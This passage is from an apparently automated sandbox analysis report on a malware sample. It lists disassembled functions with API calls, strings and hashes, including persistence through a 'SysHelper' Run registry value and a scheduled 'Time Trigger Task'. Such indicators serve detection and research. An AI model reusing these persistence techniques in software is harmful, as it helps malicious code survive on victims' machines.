                                                                                                  • Opcode Fuzzy Hash: a284d6acd605e0c04e98947d1982229790e632b1b7468ca0ab0351da8540ecb1
                                                                                                  • Instruction Fuzzy Hash: 6841C371904340ABD3109BB59C4AF2FBFF8FF99714F00051EFA54E62A1E7B598049BA6
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.2329665777.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.2329584552.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329772476.000000000053C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329814437.000000000057A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329868261.000000000057C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329958876.0000000000580000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329958876.000000000058A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329958876.0000000000599000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2330188918.000000000059B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_470000_baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_paylo.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: _strncmp
                                                                                                  • String ID: $-----$-----BEGIN $-----END $.\crypto\pem\pem_lib.c
                                                                                                  • API String ID: 909875538-2733969777
                                                                                                  • Opcode ID: 3ce4e878ccc624cf4becfef68ccdb4f8d99545788000b8a16f68a14dcff03849
                                                                                                  • Instruction ID: b450a283be415a8da617b46b3e3d74a3bef023f8f55c2cee99a0e0631906f8d5
                                                                                                  • Opcode Fuzzy Hash: 3ce4e878ccc624cf4becfef68ccdb4f8d99545788000b8a16f68a14dcff03849
                                                                                                  • Instruction Fuzzy Hash: 3FF106B56083406BD720EF25DC52F9BB7D89F55709F04082FF94896383E678DA0987AB
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.2329665777.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.2329584552.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329772476.000000000053C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329814437.000000000057A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329868261.000000000057C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329958876.0000000000580000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329958876.000000000058A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329958876.0000000000599000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2330188918.000000000059B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_470000_baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_paylo.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: _free$__calloc_crt$___freetlocinfo___removelocaleref__calloc_impl__copytlocinfo_nolock__setmbcp_nolock__wsetlocale_nolock
                                                                                                  • String ID:
                                                                                                  • API String ID: 1503006713-0
                                                                                                  • Opcode ID: 0d620ffd02c55a536f4401c6538a7dd6590ae66538f0ddc3fcef8238db81e568
                                                                                                  • Instruction ID: 81cb76c591efaec1a3862df3b6371834b3a35d60165995e7009a1f59306018c8
                                                                                                  • Opcode Fuzzy Hash: 0d620ffd02c55a536f4401c6538a7dd6590ae66538f0ddc3fcef8238db81e568
                                                                                                  • Instruction Fuzzy Hash: E9219235109A01AFEF227F66D806E0F7FE4DF81768B30443FF44459192EA6AA8109B9D
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  • DecodePointer.KERNEL32 ref: 00497B29
                                                                                                  • _free.LIBCMT ref: 00497B42
                                                                                                    • Part of subcall function 00490BED: RtlFreeHeap.NTDLL(00000000,00000000,?,0049507F,00000000,00000001,00000000,?,?,?,004A0D1A,004BF284,?), ref: 00490C01
                                                                                                    • Part of subcall function 00490BED: GetLastError.KERNEL32(00000000,?,0049507F,00000000,00000001,00000000,?,?,?,004A0D1A,004BF284,?), ref: 00490C13
                                                                                                  • _free.LIBCMT ref: 00497B55
                                                                                                  • _free.LIBCMT ref: 00497B73
                                                                                                  • _free.LIBCMT ref: 00497B85
                                                                                                  • _free.LIBCMT ref: 00497B96
                                                                                                  • _free.LIBCMT ref: 00497BA1
                                                                                                  • _free.LIBCMT ref: 00497BC5
                                                                                                  • EncodePointer.KERNEL32(013253D0), ref: 00497BCC
                                                                                                  • _free.LIBCMT ref: 00497BE1
                                                                                                  • _free.LIBCMT ref: 00497BF7
                                                                                                  • _free.LIBCMT ref: 00497C1F
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.2329665777.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.2329584552.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329772476.000000000053C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329814437.000000000057A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329868261.000000000057C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329958876.0000000000580000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329958876.000000000058A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329958876.0000000000599000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2330188918.000000000059B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_470000_baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_paylo.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: _free$Pointer$DecodeEncodeErrorFreeHeapLast
                                                                                                  • String ID:
                                                                                                  • API String ID: 3064303923-0
                                                                                                  • Opcode ID: f85006ff6c2fc77aad61fc88cc74e710f5f913b457cb871b90a9bc094e1b932c
                                                                                                  • Instruction ID: 6ed33edb5d8aafac43d40be517b5fedcdd765e470567940d603a3433bb2324d2
                                                                                                  • Opcode Fuzzy Hash: f85006ff6c2fc77aad61fc88cc74e710f5f913b457cb871b90a9bc094e1b932c
                                                                                                  • Instruction Fuzzy Hash: 2F215E368081508FCE205F55BC4490A7F64EB10728315143FED147B3B1C678788DABD8
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  • CoInitialize.OLE32(00000000), ref: 00481BB0
                                                                                                  • CoCreateInstance.OLE32(0053E908,00000000,00000001,0053D568,00000000), ref: 00481BC8
                                                                                                  • CoUninitialize.OLE32 ref: 00481BD0
                                                                                                  • SHGetSpecialFolderLocation.SHELL32(00000000,00000007,?), ref: 00481C12
                                                                                                  • SHGetPathFromIDListW.SHELL32(?,?), ref: 00481C22
                                                                                                  • lstrcatW.KERNEL32(?,00570050), ref: 00481C3A
                                                                                                  • lstrcatW.KERNEL32(?), ref: 00481C44
                                                                                                  • GetSystemDirectoryW.KERNEL32(?,00000100), ref: 00481C68
                                                                                                  • lstrcatW.KERNEL32(?,\shell32.dll), ref: 00481C7A
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.2329665777.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.2329584552.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329772476.000000000053C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329814437.000000000057A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329868261.000000000057C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329958876.0000000000580000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329958876.000000000058A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329958876.0000000000599000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2330188918.000000000059B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_470000_baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_paylo.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: lstrcat$CreateDirectoryFolderFromInitializeInstanceListLocationPathSpecialSystemUninitialize
                                                                                                  • String ID: \shell32.dll
                                                                                                  • API String ID: 679253221-3783449302
                                                                                                  • Opcode ID: fba94990ae8dee0bf81b80ff7d499415d0bb9ae3e72bc703c764c13abb728c07
                                                                                                  • Instruction ID: 7a95ddbc4818bd53151f234fd344808f9e852f5b4c4bb7e0220addb120374201
                                                                                                  • Opcode Fuzzy Hash: fba94990ae8dee0bf81b80ff7d499415d0bb9ae3e72bc703c764c13abb728c07
                                                                                                  • Instruction Fuzzy Hash: 33412E71A40219AFDB10DBA4CC88FAE7BBCEF44705F10449AF505E7250D6B1AE45CB60
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  • GetModuleHandleA.KERNEL32(FFFFFFFF,?,00000001,?,004C4B72), ref: 004C49C7
                                                                                                  • GetProcAddress.KERNEL32(00000000,_OPENSSL_isservice), ref: 004C49D7
                                                                                                  • GetDesktopWindow.USER32 ref: 004C49FB
                                                                                                  • GetProcessWindowStation.USER32(?,004C4B72), ref: 004C4A01
                                                                                                  • GetUserObjectInformationW.USER32(00000000,00000002,00000000,00000000,?,?,004C4B72), ref: 004C4A1C
                                                                                                  • GetLastError.KERNEL32(?,004C4B72), ref: 004C4A2A
                                                                                                  • GetUserObjectInformationW.USER32(00000000,00000002,?,?,?,?,004C4B72), ref: 004C4A65
                                                                                                  • _wcsstr.LIBCMT ref: 004C4A8A
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.2329665777.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.2329584552.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329772476.000000000053C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329814437.000000000057A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329868261.000000000057C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329958876.0000000000580000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329958876.000000000058A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329958876.0000000000599000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2330188918.000000000059B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_470000_baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_paylo.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: InformationObjectUserWindow$AddressDesktopErrorHandleLastModuleProcProcessStation_wcsstr
                                                                                                  • String ID: Service-0x$_OPENSSL_isservice
                                                                                                  • API String ID: 2112994598-1672312481
                                                                                                  • Opcode ID: 5d050dc55563f7704ae0c8883cd5095eaf9c58a719529814332dea8ca60fb7ee
                                                                                                  • Instruction ID: 2df2719c4cf962f730fe54ba55e45485708b798c55a35f144bf3fc07c68f7481
                                                                                                  • Opcode Fuzzy Hash: 5d050dc55563f7704ae0c8883cd5095eaf9c58a719529814332dea8ca60fb7ee
                                                                                                  • Instruction Fuzzy Hash: FA310935A401049BDB24DBB9DC06BAF7BB8EFD4720F10026EE816E32D0EB3599048B59
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  • GetStdHandle.KERNEL32(000000F4,004C4C16,%s(%d): OpenSSL internal error, assertion failed: %s,?,?,?,004C480E,.\crypto\cryptlib.c,00000253,pointer != NULL,00000000,004C1D37,00000000,0047CDAE,00000001,00000001), ref: 004C4AFA
                                                                                                  • GetFileType.KERNEL32(00000000), ref: 004C4B05
                                                                                                  • __vfwprintf_p.LIBCMT ref: 004C4B27
                                                                                                    • Part of subcall function 0049BDCC: _vfprintf_helper.LIBCMT ref: 0049BDDF
                                                                                                  • vswprintf.LIBCMT ref: 004C4B5D
                                                                                                  • RegisterEventSourceA.ADVAPI32(00000000,OPENSSL), ref: 004C4B7E
                                                                                                  • ReportEventA.ADVAPI32(00000000,00000001,00000000,00000000,00000000,00000001,00000000,?,00000000), ref: 004C4BA2
                                                                                                  • DeregisterEventSource.ADVAPI32(00000000), ref: 004C4BA9
                                                                                                  • MessageBoxA.USER32(00000000,?,OpenSSL: FATAL,00000010), ref: 004C4BD3
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.2329665777.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.2329584552.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329772476.000000000053C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329814437.000000000057A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329868261.000000000057C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329958876.0000000000580000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329958876.000000000058A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329958876.0000000000599000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2330188918.000000000059B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_470000_baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_paylo.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Event$Source$DeregisterFileHandleMessageRegisterReportType__vfwprintf_p_vfprintf_helpervswprintf
                                                                                                  • String ID: OPENSSL$OpenSSL: FATAL
                                                                                                  • API String ID: 277090408-1348657634
                                                                                                  • Opcode ID: 2deb6fa1445c31a84f8cc7e5883015ac3e9dbbde4ffe575a5bc459867c97cd29
                                                                                                  • Instruction ID: 1a4d5d24c81dac83b280b17f0559bf53ef963cb0f7d3daebfface9b805552cc9
                                                                                                  • Opcode Fuzzy Hash: 2deb6fa1445c31a84f8cc7e5883015ac3e9dbbde4ffe575a5bc459867c97cd29
                                                                                                  • Instruction Fuzzy Hash: 9B210A75644300ABEB71A760CC47FEF7BD8AF98704F40482EB699D62D0EAB894448757
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  • RegOpenKeyExW.ADVAPI32(80000001,Software\Microsoft\Windows\CurrentVersion\Run,00000000,000F003F,?), ref: 00482389
                                                                                                  • _memset.LIBCMT ref: 004823B6
                                                                                                  • RegQueryValueExW.ADVAPI32(?,SysHelper,00000000,00000001,?,00000400), ref: 004823DE
                                                                                                  • RegCloseKey.ADVAPI32(?), ref: 004823E7
                                                                                                  • GetCommandLineW.KERNEL32 ref: 004823F4
                                                                                                  • CommandLineToArgvW.SHELL32(00000000,00000000), ref: 004823FF
                                                                                                  • lstrcpyW.KERNEL32(?,00000000), ref: 0048240E
                                                                                                  • lstrcmpW.KERNEL32(?,?), ref: 00482422
                                                                                                  Strings
                                                                                                  • SysHelper, xrefs: 004823D6
                                                                                                  • Software\Microsoft\Windows\CurrentVersion\Run, xrefs: 0048237F
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.2329665777.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.2329584552.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329772476.000000000053C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329814437.000000000057A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329868261.000000000057C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329958876.0000000000580000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329958876.000000000058A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329958876.0000000000599000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2330188918.000000000059B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_470000_baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_paylo.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: CommandLine$ArgvCloseOpenQueryValue_memsetlstrcmplstrcpy
                                                                                                  • String ID: Software\Microsoft\Windows\CurrentVersion\Run$SysHelper
                                                                                                  • API String ID: 122392481-4165002228
                                                                                                  • Opcode ID: 3238a5c4fa89907f827b40b146a1f8140c245afa05bc63870786e0f1b57d924d
                                                                                                  • Instruction ID: ca4f9ed19e26d50f21fa57153fc4ba4c2c2edef32fa2bd62689c2daa6a95626c
                                                                                                  • Opcode Fuzzy Hash: 3238a5c4fa89907f827b40b146a1f8140c245afa05bc63870786e0f1b57d924d
                                                                                                  • Instruction Fuzzy Hash: F911297294020DABDF10DBA0DC49FEE7BBCBB04705F0045A5B509E2251EBB49A88AB90
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  • std::exception::exception.LIBCMT ref: 004BF27F
                                                                                                    • Part of subcall function 004A0CFC: std::exception::_Copy_str.LIBCMT ref: 004A0D15
                                                                                                  • __CxxThrowException@8.LIBCMT ref: 004BF294
                                                                                                    • Part of subcall function 004A0ECA: RaiseException.KERNEL32(?,?,004BF299,?,?,?,?,?,?,?,004BF299,?,00578238,?), ref: 004A0F1F
                                                                                                  • std::exception::exception.LIBCMT ref: 004BF2AD
                                                                                                  • __CxxThrowException@8.LIBCMT ref: 004BF2C2
                                                                                                  • std::regex_error::regex_error.LIBCPMT ref: 004BF2D4
                                                                                                    • Part of subcall function 004BEF74: std::exception::exception.LIBCMT ref: 004BEF8E
                                                                                                  • __CxxThrowException@8.LIBCMT ref: 004BF2E2
                                                                                                  • std::exception::exception.LIBCMT ref: 004BF2FB
                                                                                                  • __CxxThrowException@8.LIBCMT ref: 004BF310
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.2329665777.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.2329584552.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329772476.000000000053C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329814437.000000000057A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329868261.000000000057C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329958876.0000000000580000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329958876.000000000058A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329958876.0000000000599000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2330188918.000000000059B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_470000_baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_paylo.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Exception@8Throwstd::exception::exception$Copy_strExceptionRaisestd::exception::_std::regex_error::regex_error
                                                                                                  • String ID: bad function call$leT
                                                                                                  • API String ID: 2464034642-1982992468
                                                                                                  • Opcode ID: 7e8d4241c9bf586e4257d6ace6a9b917c20d0086af8c8fad2624f1cf9d303a93
                                                                                                  • Instruction ID: 33fa2e0fe1ee1960adfa582c73704ffd371a291c0a77dfd1108c699f5c4b54d9
                                                                                                  • Opcode Fuzzy Hash: 7e8d4241c9bf586e4257d6ace6a9b917c20d0086af8c8fad2624f1cf9d303a93
                                                                                                  • Instruction Fuzzy Hash: 75111C74D4020DBBCF00EFA5C489CDEBFBCEA14348F408566BD2497141EA74A3098B95
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.2329665777.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.2329584552.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329772476.000000000053C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329814437.000000000057A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329868261.000000000057C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329958876.0000000000580000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329958876.000000000058A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329958876.0000000000599000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2330188918.000000000059B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_470000_baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_paylo.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Ex_nolock__lock__updatetlocinfo$___removelocaleref__calloc_crt__copytlocinfo_nolock__wsetlocale_nolock_wcscmp
                                                                                                  • String ID:
                                                                                                  • API String ID: 1077091919-0
                                                                                                  • Opcode ID: aefafe41962d5a77c8bb217b4d899e96cb5c1adf095610945aff78ee2d035398
                                                                                                  • Instruction ID: d46f6f3a2190c9053b1642595a30315cd45fbb08c79ab863b7a65c96c6f242ed
                                                                                                  • Opcode Fuzzy Hash: aefafe41962d5a77c8bb217b4d899e96cb5c1adf095610945aff78ee2d035398
                                                                                                  • Instruction Fuzzy Hash: 8E41E632404704AFDF12AFA5E846B9E7FE4AF44328F20803FF51896282DB7D5945DB19
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.2329665777.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.2329584552.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329772476.000000000053C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329814437.000000000057A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329868261.000000000057C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329958876.0000000000580000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329958876.000000000058A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329958876.0000000000599000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2330188918.000000000059B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_470000_baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_paylo.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: _memmove
                                                                                                  • String ID: invalid string position$string too long
                                                                                                  • API String ID: 4104443479-4289949731
                                                                                                  • Opcode ID: b4b080babb993dd4033e657683a3725c631605da341b0860be8ffbfff74f21db
                                                                                                  • Instruction ID: 3a044d7e385452de9a39b7dd4c9fd04ccf7ac53d445b8dd23ef8bae2252312df
                                                                                                  • Opcode Fuzzy Hash: b4b080babb993dd4033e657683a3725c631605da341b0860be8ffbfff74f21db
                                                                                                  • Instruction Fuzzy Hash: EEC19D70700209DFDB18EF08C98196E77A6EF85704BA44D2EE891CB741DF34ED528B99
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  • CoInitialize.OLE32(00000000), ref: 0047DAEB
                                                                                                  • CoCreateInstance.OLE32(00544F6C,00000000,00000001,00544F3C,?,?,0053A948,000000FF), ref: 0047DB0B
                                                                                                  • lstrcpyW.KERNEL32(?,?), ref: 0047DBD6
                                                                                                  • PathRemoveFileSpecW.SHLWAPI(?,?,?,?,?,?,0053A948,000000FF), ref: 0047DBE3
                                                                                                  • _memset.LIBCMT ref: 0047DC38
                                                                                                  • CoUninitialize.OLE32 ref: 0047DC92
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.2329665777.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.2329584552.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329772476.000000000053C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329814437.000000000057A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329868261.000000000057C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329958876.0000000000580000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329958876.000000000058A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329958876.0000000000599000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2330188918.000000000059B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_470000_baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_paylo.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: CreateFileInitializeInstancePathRemoveSpecUninitialize_memsetlstrcpy
                                                                                                  • String ID: --Task$Comment$Time Trigger Task
                                                                                                  • API String ID: 330603062-1376107329
                                                                                                  • Opcode ID: 3595db21f34d39bc15f78dedcf65226f7fd93b01123a562ffa5d3f2a3fc48081
                                                                                                  • Instruction ID: 3022cf35e0ab8eac733533ec91b7879f762c34e2498c8ccb33b4b61958afe321
                                                                                                  • Opcode Fuzzy Hash: 3595db21f34d39bc15f78dedcf65226f7fd93b01123a562ffa5d3f2a3fc48081
                                                                                                  • Instruction Fuzzy Hash: FE51B271A40209EFDB00DF94C889FAE7BB9FF48705F108559F509AB290DB75A949CF90
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  • OpenSCManagerW.ADVAPI32(00000000,00000000,00000001), ref: 00481A1D
